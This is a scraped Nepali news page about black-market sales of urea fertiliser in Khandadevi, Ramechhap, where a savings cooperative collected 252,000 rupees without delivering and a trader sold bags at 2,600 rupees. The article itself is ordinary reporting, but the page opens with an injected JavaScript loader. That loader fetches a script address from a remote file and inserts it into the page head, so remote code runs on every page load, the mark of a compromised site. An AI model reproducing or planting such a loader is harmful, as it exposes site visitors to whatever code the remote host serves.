;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापको खाँडादेवीमा मलमा कालो बजारी : सम्बन्धति निकाय चुपचाप – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापको खाँडादेवीमा मलमा कालो बजारी : सम्बन्धति निकाय चुपचाप
जुनेली बिशेष

रामेछापको खाँडादेवीमा मलमा कालो बजारी : सम्बन्धति निकाय चुपचाप

मलमा कालोबजारी

साउन २२,

रामेछाप । रामेछापको खाँडादेवि गाउँपालिकामा मोलमा ब्यापक कालोवजारी भएको रहस्य खुलेको छ । गाउँपालिकाको वडा नम्बर ३ लाक्पामा एक बोराको ९ सय ५० रुपैयाँ पर्ने युरिया मल मल व्यवसायिले २ हजार ६ सय रुपैयाँमा बेचेका छन् भने वडा नम्बर–४ का कृषकलाई यूरिया मल घरघरमै ल्याइदिने भन्दै स्थानीय सहकारीले पैसा उठाएर कृषकलाई गठी गरेका छन ।

मकैमा हाल्नको लागि घरघरमै मल ल्याइदिने भनि चेतनशील महिला बचत तथा ऋण सहकारी संस्था लिमिटेड पकरबासले गत चैत्र महिनामा कृषकहरुसँग पैसा उठाएको थियो ।
सहकारीले ५० केजीको मल प्रतिबोरा १ हजार रुपैयाँको दरले घरमै ल्याइदिने भन्दै स्थानीय कृषकहरुसँग २ लाख ५२ हजार रुपैयाँ पैसा उठाएको थियो । तर एक हजार रुपैयाँ तिर्ने कृषकलाई १० केजी मात्रै मल दिएको कृषकको गुनासो छ ।

मकैमा मल हाल्ने बेलासम्म पनि सहकारीले मल नदिएपछि आपुहरुले एक बोरा मलको १ हजार ८ सय रुपैयाँ तिरेर खरिद गर्नुपरेको कृषक कृष्णप्रसाद शिवाकोटीले बताउनु भयो । पैसा नहुने कृषकहरुले छीमेकीसँग पैँचो लिएर कमैमा मल हाले तर सहकारीले मकै भित्र्याउने बेलासम्म पनि मल मल नपाएको शिवाकोटीले जानकारी दिए । कृषकहरुसँग पैसा उठाएर मल दिन नसकेको सहकारीले स्वीकार गरेको छ ।

मल खरिद गर्नको लागि ५० केजीको मल प्रतिबोरा १ हजार रुपैयाँको दरले २ लाख ५२ हजार रुपैयाँ पैसा कृषकहरुसँग संकलन गरेको चेतनशील महिला बचत तथा ऋण सहकारी संस्थाका अध्यक्ष रमा भण्डारीले स्वीकार गर्दै लक डाउनको कारण देखाउदै मल दिन नसकिएको बताउनु भयो ।

त्यस्तै खाँडादेवि गाउँपालिका–३ का कृषकहरुले ९ सय ५० रुपैयाँ पर्ने एक बोरा युरिया मललाई २ हजार ६ सय रुपैयाँ तिरेर किनेका छन् । स्थानीय ब्यवसायिले गाउँपालिकासँग सिफारिस लिएर नै बोराको २ हजार ६ सय रुपैयाँमा मल बिक्री गरेपछि किसानहरु चर्को मूल्य तिर्न बाध्य भएका हुन् ।

गाउँपालिकाले कृषि सहकारी मार्फत गाउँगाउँमा सुफत मूल्यमा युरिया मल वितरण गर्ने भने पनि गाउँपालिकाले दिने भनिएको मल समयमै नआएपछि आफुहरुले चर्को मूल्य तिरेर मल किन्न बाध्य भएको कृषक मानबहादुर पौडेले बताउनु भयो । बढि मूल्य लिएर मल बिक्री वितरण गर्ने सहकारीको इजाजत जफत गर्ने गाउँपालिकाले बताए पनि ब्यक्ति मार्फत ल्याएर ९ सय ५० रुपैयाँ पर्ने मललाई २ हजार ६ सय रुपैयाँमा बिक्री गर्न गाउँपालिकाले अनुमति दिएको स्थानिय गोपाल पौडेलले बताए ।

स्थानीय श्याम श्रेष्ठले रातको समय मल ल्याएर गाउँलेहरुलाई प्रतिबोरा २ हजार ६ सय रुपैयाँका दरले बिक्री गरेका थिए । गाउँपालिकाको कृषि शाखाका निमत्ति प्रमुख विजय श्रेष्ठ कृषि सहकारीलाई मात्र मल ल्याउन अनुमति दिएको बताए पनि मल बिक्रेता श्याम श्रेष्ठले गाउँपालिकाकै अनुमतिमा आफूले २ हजार ४ सय रुपैयाँमा मल ल्याएर २ हजार ६ सय रुपैयाँ बिक्री गरेको बताएका छन् ।

मलको अभाव र कालो वजारी रोक्न निश्चित मापदण्ड बनाएर सबै ब्यवायिलाई मल बिक्री गर्न दिए मात्र कृषकले समयमै सरल तरिकाले मल प्राप्त गर्न सक्ने उद्योग बाणिज्य संघ रामेछापका निवर्तमान अध्यक्ष श्याम थापाले बताउनु भयो । मलमा कालो बजारी भइरहँदा पनि स्थानीय सरकार भने मौन बसेका छन् । स्थानीय सरकारले कृषि क्षेत्रको विकास र प्रवद्र्धको लागि ठूला ठूला योजनामाहरु बनाए पनि ती योजनाहरु कागजमै सिमित रहेका छन् ।file Photo

फेसबुक प्रतिक्रियाहरु